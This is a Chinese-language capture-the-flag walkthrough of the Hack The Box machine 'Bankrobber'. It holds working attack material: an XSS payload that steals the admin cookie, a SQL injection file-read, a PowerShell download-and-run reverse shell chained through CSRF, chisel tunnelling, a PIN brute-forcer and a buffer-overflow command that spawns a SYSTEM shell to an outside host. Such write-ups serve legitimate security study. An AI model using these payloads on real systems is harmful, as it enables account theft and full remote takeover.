基本信息

端口扫描

80,443,445,3306:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$ nmap -sC -sV 10.10.10.154
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 13:21 CST
Nmap scan report for 10.10.10.154
Host is up (0.068s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp  open  ssl/http     Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql        MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-29T06:23:01
|_  start_date: 2020-12-29T06:06:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.34 seconds

80/443

一个比特币交易所:

Web

随意注册账号登录,有初始余额,可以转账操作,测试转账会提示Admin会查看审核:

XSS

因为提示管理员会查看,那就在comment那里尝试XSS,确认存在,并且可以发现admin路径,cookie中就是用户名密码的base64,那就直接xss打管理员cookie(XSS bot很不稳定,如果收不到请求就注销重新登录重试):

1
<script src="http://10.10.14.15:7777/cookie.js"></script>

打到管理员cookie,解码得到admin密码:

1
2
3
username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1

admin : Hopelessromantic

admin

然后登录admin账号,现在我们是admin:

admin顶部有一些链接,查看内容

notes.txt

notes提示这是xampp,现在还是默认目录;对localhost没有编码

1
2
3
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..

backdoorchecker

页面还有个backdoorchecker功能,提示只能使用dir,输入dir后提示只能localhost请求:

1
2
3
var request = new XMLHttpRequest();
request.open('GET', 'http://10.10.14.15:7777/?cookies='+document.cookie, true);
request.send();

SQL注入

admin页面还有个用户搜索功能,很基础的sql注入:

判断列数,3列,直接回显1,2:

load_file

mysql有load_file可以读文件,结合前面的信息xampp默认路径,可以去读源码(这里已经可以直接去读user.txt了):

1
1'union+select+1,load_file('c:\\xampp\\htdocs\\admin\\backdoorchecker.php'),3;--+-

根据代码逻辑,我们可以通过XSS构造admin localhost的请求,使其执行任意命令

backdoorchecker.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
include('../link.php');
include('auth.php');

$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad 	  = array('$(','&');
$good 	  = "ls";

if(strtolower(substr(PHP_OS,0,3)) == "win"){
	$good = "dir";
}

if($username == "admin" && $password == "Hopelessromantic"){
	if(isset($_POST['cmd'])){
			// FILTER ESCAPE CHARS
			foreach($bad as $char){
				if(strpos($_POST['cmd'],$char) !== false){
					die("You're not allowed to do that.");
				}
			}
			// CHECK IF THE FIRST 2 CHARS ARE LS
			if(substr($_POST['cmd'], 0,strlen($good)) != $good){
				die("It's only allowed to use the $good command");
			}

			if($_SERVER['REMOTE_ADDR'] == "::1"){
				system($_POST['cmd']);
			} else{
				echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
			}
	}
} else{
	echo "You are not allowed to use this function!";
}
?>

XSS + XSRF = Shell

然后就是修改xss代码,让管理员执行命令,reverse shell:

shell.js

1
2
3
4
5
var request = new XMLHttpRequest();
var params = 'cmd=dir|powershell -c "iwr -uri 10.10.14.15:7777/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.15 4445';
request.open('POST', 'http://localhost/admin/backdoorchecker.php', true);
request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
request.send(params);

user flag

然后直接用户桌面得到user.txt:

提权信息

C盘根目录有个bankv2.exe,当前用户没有权限:

查看端口和进程发现bankv2.exe运行在本地的910端口,可以把端口转发出来:

1
2
3
4
5
6
# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 8000 --reverse

# target
powershell -c "wget 10.10.14.15:7777/chisel.exe -o c.exe"
c.exe client 10.10.14.15:8000 R:910:localhost:910

然后测试连接本机910端口,提示需要4位pin码:

netstat -ano | findstr LISTENING

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
netstat -ano | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       3364
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       732
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       3364
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:910            0.0.0.0:0              LISTENING       1572
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       3388
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       444
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1340
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       576
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       584
  TCP    10.10.10.154:139       0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       3364
  TCP    [::]:135               [::]:0                 LISTENING       732
  TCP    [::]:443               [::]:0                 LISTENING       3364
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:3306              [::]:0                 LISTENING       3388
  TCP    [::]:49664             [::]:0                 LISTENING       444
  TCP    [::]:49665             [::]:0                 LISTENING       892
  TCP    [::]:49666             [::]:0                 LISTENING       876
  TCP    [::]:49667             [::]:0                 LISTENING       1340
  TCP    [::]:49668             [::]:0                 LISTENING       576
  TCP    [::]:49669             [::]:0                 LISTENING       584

tasklist

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0                            0          4 K
System                           4                            0        140 K
smss.exe                       288                            0      1.188 K
csrss.exe                      360                            0      8.324 K
wininit.exe                    444                            0      5.296 K
csrss.exe                      452                            1      4.140 K
winlogon.exe                   520                            1     13.744 K
services.exe                   576                            0      7.696 K
lsass.exe                      584                            0     13.052 K
svchost.exe                    668                            0     14.652 K
svchost.exe                    732                            0      9.084 K
dwm.exe                        824                            1     30.176 K
svchost.exe                    876                            0     50.968 K
svchost.exe                    892                            0     16.632 K
svchost.exe                    904                            0     24.436 K
svchost.exe                    936                            0     16.752 K
svchost.exe                    392                            0     16.804 K
svchost.exe                   1052                            0     16.520 K
svchost.exe                   1100                            0      7.928 K
svchost.exe                   1196                            0      7.124 K
spoolsv.exe                   1340                            0     15.596 K
bankv2.exe                    1572                            0         80 K
svchost.exe                   1624                            0     20.816 K
svchost.exe                   1652                            0     10.156 K
vmtoolsd.exe                  1780                            0     23.688 K
VGAuthService.exe             1788                            0     13.024 K
Memory Compression            1904                            0     34.376 K
xampp-control.exe             2224                            0      2.912 K
WmiPrvSE.exe                  2364                            0     19.144 K
dllhost.exe                   2436                            0     13.020 K
msdtc.exe                     2612                            0     10.180 K
LogonUI.exe                   2780                            1     49.004 K
SearchIndexer.exe             2864                            0     18.632 K
conhost.exe                   2276                            0        560 K
httpd.exe                     3364                            0         36 K
conhost.exe                   3372                            0         48 K
mysqld.exe                    3388                            0     14.748 K
conhost.exe                   3400                            0        112 K
httpd.exe                     3724                            0      6.868 K
svchost.exe                   3544                            0      7.076 K
sedsvc.exe                    2788                            0      8.488 K
svchost.exe                   3688                            0      8.296 K
cmd.exe                       1692                            0      2.772 K
conhost.exe                   1504                            0      4.188 K
powershell.exe                3012                            0      6.784 K
n.exe                         2420                            0      3.936 K
cmd.exe                       4236                            0      3.116 K
SearchProtocolHost.exe        1524                            0     10.764 K
SearchFilterHost.exe          1292                            0      6.336 K
tasklist.exe                  4424                            0      7.784 K

bankv2

首先脚本爆破出来pin码是0021:

使用正确的pin码测试功能:

overflow

如果输入长字符串,会发现覆盖了内部调用的程序,基础的溢出:

那就是常规的确认偏移,构造payload:

1
2
3
4
➜  ~ msf-pattern_create -l 40
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A
➜  ~ msf-pattern_offset -q 0Ab1
[*] Exact match at offset 32

exploit

就直接修改为使用我们前面传的nc反弹shell,system权限:

1
2
python -c 'print "A"*32 + "\\Users\\Cortin\\AppData\\Local\\Temp\\n.exe -e cmd.exe 10.10.14.15 4446"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\Users\Cortin\AppData\Local\Temp\n.exe -e cmd.exe 10.10.14.15 4446

brute.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/env python3

import socket
import sys


for i in range(10000):
    sys.stdout.write(f"\rTrying: {i:04d}")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('localhost', 910))
    s.recv(4096)
    s.send(f"{i:04d}\n".encode())
    resp = s.recv(4096)
    if not b"Access denied" in resp:
        print(f"\rFound pin: {i:04d}")
        break
    s.close()

root flag

之后就直接在admin桌面得到root.txt:

参考资料